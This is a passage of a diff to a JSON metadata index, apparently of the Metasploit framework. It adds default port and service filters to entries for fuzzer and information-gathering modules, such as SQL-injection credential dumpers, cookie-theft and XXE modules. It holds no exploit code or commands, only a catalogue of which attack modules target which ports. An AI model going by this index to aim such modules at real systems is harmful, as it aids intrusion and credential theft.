+ ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb", @@ -9573,6 +12599,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb", @@ -9602,6 +12634,12 @@ "platform": "", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb", @@ -9631,6 +12669,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb", @@ -9660,6 +12712,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb", @@ -9691,6 +12757,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb", @@ -9720,6 +12801,21 @@ "platform": "Linux", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb", @@ -9752,6 +12848,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb", @@ -9783,6 +12894,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_browser_file_theft.rb", @@ -9814,6 +12931,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb", @@ -9845,6 +12968,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_htmlfileprovider.rb", @@ -9877,6 +13006,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", @@ -9909,6 +13044,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/gather/android_stock_browser_uxss.rb", @@ -9942,6 +13083,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/apache_rave_creds.rb", @@ -9973,6 +13129,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb", @@ -10002,6 +13164,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb", @@ -10034,6 +13202,12 @@ "platform": "", "arch": "", "rport": 5038, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-30 15:18:23 +0000", "path": "/modules/auxiliary/gather/asterisk_creds.rb", @@ -10063,6 +13237,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/avtech744_dvr_accounts.rb", @@ -10092,6 +13281,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/browser_info.rb", @@ -10124,6 +13319,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-04-11 01:45:41 +0000", "path": "/modules/auxiliary/gather/browser_lanipleak.rb", @@ -10153,6 +13354,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/censys_search.rb", @@ -10183,6 +13390,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb", @@ -10213,6 +13435,12 @@ "platform": "", "arch": "", "rport": 264, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/gather/checkpoint_hostname.rb", @@ -10242,6 +13470,12 @@ "platform": "", "arch": "", "rport": 1604, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/gather/citrix_published_applications.rb", @@ -10272,6 +13506,12 @@ "platform": "", "arch": "", "rport": 1604, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/gather/citrix_published_bruteforce.rb", @@ -10305,6 +13545,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/coldfusion_pwd_props.rb", @@ -10334,6 +13589,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/corpwatch_lookup_id.rb", @@ -10363,6 +13633,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 08:43:10 +0000", "path": "/modules/auxiliary/gather/corpwatch_lookup_name.rb", @@ -10392,6 +13677,12 @@ "platform": "", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/d20pass.rb", @@ -10423,6 +13714,12 @@ "platform": "Windows", "arch": "", "rport": 1604, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/darkcomet_filedownloader.rb", @@ -10455,6 +13752,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-19 22:15:14 +0000", "path": "/modules/auxiliary/gather/dolibarr_creds_sqli.rb", @@ -10485,6 +13797,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/doliwamp_traversal_creds.rb", @@ -10520,6 +13847,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/drupal_openid_xxe.rb", @@ -10551,6 +13893,21 @@ "platform": "", "arch": "", "rport": 4679, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-24 21:38:44 +0000", "path": "/modules/auxiliary/gather/eaton_nsm_creds.rb", @@ -10581,6 +13938,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/gather/emc_cta_xxe.rb", @@ -10612,6 +13984,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-07-15 15:38:56 +0000", "path": "/modules/auxiliary/gather/enum_dns.rb", @@ -10645,6 +14023,21 @@ "platform": "", "arch": "", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/eventlog_cred_disclosure.rb", @@ -10674,6 +14067,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/external_ip.rb", @@ -10707,6 +14115,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb", @@ -10741,6 +14164,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb", @@ -10774,6 +14203,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb", @@ -10805,6 +14240,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-27 16:06:07 +0000", "path": "/modules/auxiliary/gather/get_user_spns.py", @@ -10838,6 +14279,12 @@ "platform": "", "arch": "", "rport": 5227, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/hp_enum_perfd.rb", @@ -10868,6 +14315,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/hp_snac_domain_creds.rb", @@ -10897,6 +14359,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-17 16:58:57 +0000", "path": "/modules/auxiliary/gather/http_pdf_authors.rb", @@ -10929,6 +14406,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/huawei_wifi_info.rb", @@ -10959,6 +14451,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb", @@ -10989,6 +14496,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ibm_sametime_room_brute.rb", @@ -11019,6 +14541,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ibm_sametime_version.rb", @@ -11050,6 +14587,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ie_sandbox_findfiles.rb", @@ -11086,6 +14629,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/ie_uxss_injection.rb", @@ -11115,6 +14664,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/impersonate_ssl.rb", @@ -11144,6 +14699,12 @@ "platform": "", "arch": "", "rport": 1099, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/java_rmi_registry.rb", @@ -11175,6 +14736,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/jenkins_cred_recovery.rb", @@ -11205,6 +14781,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb", @@ -11237,6 +14828,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/joomla_contenthistory_sqli.rb", @@ -11267,6 +14873,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/joomla_weblinks_sqli.rb", @@ -11296,6 +14917,12 @@ "platform": "", "arch": "", "rport": 88, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/kerberos_enumusers.rb", @@ -11326,6 +14953,21 @@ "platform": "", "arch": "", "rport": "50001", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb", @@ -11358,6 +15000,20 @@ "platform": "", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/lansweeper_collector.rb", @@ -11389,6 +15045,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/mantisbt_admin_sqli.rb", @@ -11420,6 +15091,21 @@ "platform": "", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/mcafee_epo_xxe.rb", @@ -11449,6 +15135,12 @@ "platform": "", "arch": "", "rport": 11211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/memcached_extractor.rb", @@ -11478,6 +15170,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb", @@ -11511,6 +15218,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/ms14_052_xmldom.rb", @@ -11540,6 +15253,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/mybb_db_fingerprint.rb", @@ -11569,6 +15297,12 @@ "platform": "", "arch": "", "rport": 5351, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/natpmp_external_address.rb", @@ -11604,6 +15338,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/netgear_password_disclosure.rb", @@ -11637,6 +15386,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-13 22:55:01 +0000", "path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb", @@ -11667,6 +15422,12 @@ "platform": "", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-13 22:55:01 +0000", "path": "/modules/auxiliary/gather/nis_ypserv_map.rb", @@ -11697,6 +15458,21 @@ "platform": "", "arch": "", "rport": 8980, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/opennms_xxe.rb", @@ -11729,6 +15505,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-19 22:15:14 +0000", "path": "/modules/auxiliary/gather/pimcore_creds_sqli.rb", @@ -11761,6 +15552,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb", @@ -11792,6 +15598,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/safari_file_url_navigation.rb", @@ -11824,6 +15636,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-12-16 22:10:02 +0000", "path": "/modules/auxiliary/gather/samsung_browser_sop_bypass.rb", @@ -11853,6 +15671,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/search_email_collector.rb", @@ -11882,6 +15706,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-17 16:58:57 +0000", "path": "/modules/auxiliary/gather/searchengine_subdomains_collector.rb", @@ -11911,6 +15750,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/shodan_honeyscore.rb", @@ -11941,6 +15786,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/shodan_search.rb", @@ -11970,6 +15830,21 @@ "platform": "Windows", "arch": "", "rport": 6161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/snare_registry.rb", @@ -11999,6 +15874,21 @@ "platform": "", "arch": "", "rport": 8787, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/solarwinds_orion_sqli.rb", @@ -12029,6 +15919,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-01-22 16:32:16 +0000", "path": "/modules/auxiliary/gather/ssllabs_scan.rb", @@ -12058,6 +15954,12 @@ "platform": "", "arch": "", "rport": 10333, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-08-21 08:50:26 +0000", "path": "/modules/auxiliary/gather/teamtalk_creds.rb", @@ -12090,6 +15992,12 @@ "platform": "", "arch": "", "rport": 9010, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/trackit_sql_domain_creds.rb", @@ -12125,6 +16033,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/vbulletin_vote_sqli.rb", @@ -12155,6 +16078,14 @@ "platform": "", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb", @@ -12186,6 +16117,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/wp_all_in_one_migration_export.rb", @@ -12216,6 +16162,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb", @@ -12248,6 +16209,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb", @@ -12281,6 +16257,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/xbmc_traversal.rb", @@ -12311,6 +16302,12 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/xerox_pwd_extract.rb", @@ -12341,6 +16338,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb", @@ -12372,6 +16384,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/gather/zabbix_toggleids_sqli.rb", @@ -12403,6 +16430,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/gather/zoomeye_search.rb", @@ -12434,6 +16467,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/parser/unattend.rb", @@ -12466,6 +16505,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/pdf/foxit/authbypass.rb", @@ -12495,6 +16540,12 @@ "platform": "", "arch": "", "rport": 5009, + "autofilter_ports": [ + 5009 + ], + "autofilter_services": [ + + ], 